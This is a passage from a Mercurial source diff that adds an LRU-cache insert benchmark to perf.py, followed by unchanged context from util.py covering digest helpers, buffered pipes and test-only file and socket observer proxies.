1741 1741 clearfilecache(repo, b'obsstore')
1742 1742 obsolete.getrevs(repo, name)
1743 1743 return d
1744 1744
1745 1745 allobs = sorted(obsolete.cachefuncs)
1746 1746 if names:
1747 1747 allobs = [n for n in allobs if n in names]
1748 1748
1749 1749 for name in allobs:
1750 1750 timer(getobs(name), title=name)
1751 1751
1752 1752 def getfiltered(name):
1753 1753 def d():
1754 1754 repo.invalidatevolatilesets()
1755 1755 if opts[b'clear_obsstore']:
1756 1756 clearfilecache(repo, b'obsstore')
1757 1757 repoview.filterrevs(repo, name)
1758 1758 return d
1759 1759
1760 1760 allfilter = sorted(repoview.filtertable)
1761 1761 if names:
1762 1762 allfilter = [n for n in allfilter if n in names]
1763 1763
1764 1764 for name in allfilter:
1765 1765 timer(getfiltered(name), title=name)
1766 1766 fm.end()
1767 1767
1768 1768 @command(b'perfbranchmap',
1769 1769 [(b'f', b'full', False,
1770 1770 b'Includes build time of subset'),
1771 1771 (b'', b'clear-revbranch', False,
1772 1772 b'purge the revbranch cache between computation'),
1773 1773 ] + formatteropts)
1774 1774 def perfbranchmap(ui, repo, *filternames, **opts):
1775 1775 """benchmark the update of a branchmap
1776 1776
1777 1777 This benchmarks the full repo.branchmap() call with read and write disabled
1778 1778 """
1779 1779 full = opts.get(b"full", False)
1780 1780 clear_revbranch = opts.get(b"clear_revbranch", False)
1781 1781 timer, fm = gettimer(ui, opts)
1782 1782 def getbranchmap(filtername):
1783 1783 """generate a benchmark function for the filtername"""
1784 1784 if filtername is None:
1785 1785 view = repo
1786 1786 else:
1787 1787 view = repo.filtered(filtername)
1788 1788 def d():
1789 1789 if clear_revbranch:
1790 1790 repo.revbranchcache()._clear()
1791 1791 if full:
1792 1792 view._branchcaches.clear()
1793 1793 else:
1794 1794 view._branchcaches.pop(filtername, None)
1795 1795 view.branchmap()
1796 1796 return d
1797 1797 # add filter in smaller subset to bigger subset
1798 1798 possiblefilters = set(repoview.filtertable)
1799 1799 if filternames:
1800 1800 possiblefilters &= set(filternames)
1801 1801 subsettable = getbranchmapsubsettable()
1802 1802 allfilters = []
1803 1803 while possiblefilters:
1804 1804 for name in possiblefilters:
1805 1805 subset = subsettable.get(name)
1806 1806 if subset not in possiblefilters:
1807 1807 break
1808 1808 else:
1809 1809 assert False, b'subset cycle %s!' % possiblefilters
1810 1810 allfilters.append(name)
1811 1811 possiblefilters.remove(name)
1812 1812
1813 1813 # warm the cache
1814 1814 if not full:
1815 1815 for name in allfilters:
1816 1816 repo.filtered(name).branchmap()
1817 1817 if not filternames or b'unfiltered' in filternames:
1818 1818 # add unfiltered
1819 1819 allfilters.append(None)
1820 1820
1821 1821 branchcacheread = safeattrsetter(branchmap, b'read')
1822 1822 branchcachewrite = safeattrsetter(branchmap.branchcache, b'write')
1823 1823 branchcacheread.set(lambda repo: None)
1824 1824 branchcachewrite.set(lambda bc, repo: None)
1825 1825 try:
1826 1826 for name in allfilters:
1827 1827 printname = name
1828 1828 if name is None:
1829 1829 printname = b'unfiltered'
1830 1830 timer(getbranchmap(name), title=str(printname))
1831 1831 finally:
1832 1832 branchcacheread.restore()
1833 1833 branchcachewrite.restore()
1834 1834 fm.end()
1835 1835
1836 1836 @command(b'perfbranchmapload', [
1837 1837 (b'f', b'filter', b'', b'Specify repoview filter'),
1838 1838 (b'', b'list', False, b'List brachmap filter caches'),
1839 1839 ] + formatteropts)
1840 1840 def perfbranchmapread(ui, repo, filter=b'', list=False, **opts):
1841 1841 """benchmark reading the branchmap"""
1842 1842 if list:
1843 1843 for name, kind, st in repo.cachevfs.readdir(stat=True):
1844 1844 if name.startswith(b'branch2'):
1845 1845 filtername = name.partition(b'-')[2] or b'unfiltered'
1846 1846 ui.status(b'%s - %s\n'
1847 1847 % (filtername, util.bytecount(st.st_size)))
1848 1848 return
1849 1849 if filter:
1850 1850 repo = repoview.repoview(repo, filter)
1851 1851 else:
1852 1852 repo = repo.unfiltered()
1853 1853 # try once without timer, the filter may not be cached
1854 1854 if branchmap.read(repo) is None:
1855 1855 raise error.Abort(b'No brachmap cached for %s repo'
1856 1856 % (filter or b'unfiltered'))
1857 1857 timer, fm = gettimer(ui, opts)
1858 1858 timer(lambda: branchmap.read(repo) and None)
1859 1859 fm.end()
1860 1860
1861 1861 @command(b'perfloadmarkers')
1862 1862 def perfloadmarkers(ui, repo):
1863 1863 """benchmark the time to parse the on-disk markers for a repo
1864 1864
1865 1865 Result is the number of markers in the repo."""
1866 1866 timer, fm = gettimer(ui)
1867 1867 svfs = getsvfs(repo)
1868 1868 timer(lambda: len(obsolete.obsstore(svfs)))
1869 1869 fm.end()
1870 1870
1871 1871 @command(b'perflrucachedict', formatteropts +
1872 1872 [(b'', b'size', 4, b'size of cache'),
1873 1873 (b'', b'gets', 10000, b'number of key lookups'),
1874 1874 (b'', b'sets', 10000, b'number of key sets'),
1875 1875 (b'', b'mixed', 10000, b'number of mixed mode operations'),
1876 1876 (b'', b'mixedgetfreq', 50, b'frequency of get vs set ops in mixed mode')],
1877 1877 norepo=True)
1878 1878 def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
1879 1879 mixedgetfreq=50, **opts):
1880 1880 def doinit():
1881 1881 for i in xrange(10000):
1882 1882 util.lrucachedict(size)
1883 1883
1884 1884 values = []
1885 1885 for i in xrange(size):
1886 1886 values.append(random.randint(0, sys.maxint))
1887 1887
1888 1888 # Get mode fills the cache and tests raw lookup performance with no
1889 1889 # eviction.
1890 1890 getseq = []
1891 1891 for i in xrange(gets):
1892 1892 getseq.append(random.choice(values))
1893 1893
1894 1894 def dogets():
1895 1895 d = util.lrucachedict(size)
1896 1896 for v in values:
1897 1897 d[v] = v
1898 1898 for key in getseq:
1899 1899 value = d[key]
1900 1900 value # silence pyflakes warning
1901 1901
1902 1902 # Set mode tests insertion speed with cache eviction.
1903 1903 setseq = []
1904 1904 for i in xrange(sets):
1905 1905 setseq.append(random.randint(0, sys.maxint))
1906 1906
1907 def doinserts():
1908 d = util.lrucachedict(size)
1909 for v in setseq:
1910 d.insert(v, v)
1911
1907 1912 def dosets():
1908 1913 d = util.lrucachedict(size)
1909 1914 for v in setseq:
1910 1915 d[v] = v
1911 1916
1912 1917 # Mixed mode randomly performs gets and sets with eviction.
1913 1918 mixedops = []
1914 1919 for i in xrange(mixed):
1915 1920 r = random.randint(0, 100)
1916 1921 if r < mixedgetfreq:
1917 1922 op = 0
1918 1923 else:
1919 1924 op = 1
1920 1925
1921 1926 mixedops.append((op, random.randint(0, size * 2)))
1922 1927
1923 1928 def domixed():
1924 1929 d = util.lrucachedict(size)
1925 1930
1926 1931 for op, v in mixedops:
1927 1932 if op == 0:
1928 1933 try:
1929 1934 d[v]
1930 1935 except KeyError:
1931 1936 pass
1932 1937 else:
1933 1938 d[v] = v
1934 1939
1935 1940 benches = [
1936 1941 (doinit, b'init'),
1937 1942 (dogets, b'gets'),
1943 (doinserts, b'inserts'),
1938 1944 (dosets, b'sets'),
1939 1945 (domixed, b'mixed')
1940 1946 ]
1941 1947
1942 1948 for fn, title in benches:
1943 1949 timer, fm = gettimer(ui, opts)
1944 1950 timer(fn, title=title)
1945 1951 fm.end()
1946 1952
1947 1953 @command(b'perfwrite', formatteropts)
1948 1954 def perfwrite(ui, repo, **opts):
1949 1955 """microbenchmark ui.write
1950 1956 """
1951 1957 timer, fm = gettimer(ui, opts)
1952 1958 def write():
1953 1959 for i in range(100000):
1954 1960 ui.write((b'Testing write performance\n'))
1955 1961 timer(write)
1956 1962 fm.end()
1957 1963
1958 1964 def uisetup(ui):
1959 1965 if (util.safehasattr(cmdutil, b'openrevlog') and
1960 1966 not util.safehasattr(commands, b'debugrevlogopts')):
1961 1967 # for "historical portability":
1962 1968 # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
1963 1969 # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
1964 1970 # openrevlog() should cause failure, because it has been
1965 1971 # available since 3.5 (or 49c583ca48c4).
1966 1972 def openrevlog(orig, repo, cmd, file_, opts):
1967 1973 if opts.get(b'dir') and not util.safehasattr(repo, b'dirlog'):
1968 1974 raise error.Abort(b"This version doesn't support --dir option",
1969 1975 hint=b"use 3.5 or later")
1970 1976 return orig(repo, cmd, file_, opts)
1971 1977 extensions.wrapfunction(cmdutil, b'openrevlog', openrevlog)
@@ -1,3920 +1,3941 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 145 # to display anything to standard user so detect if we are running test and
146 146 # only use python deprecation warning in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % k)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class let us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapse it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
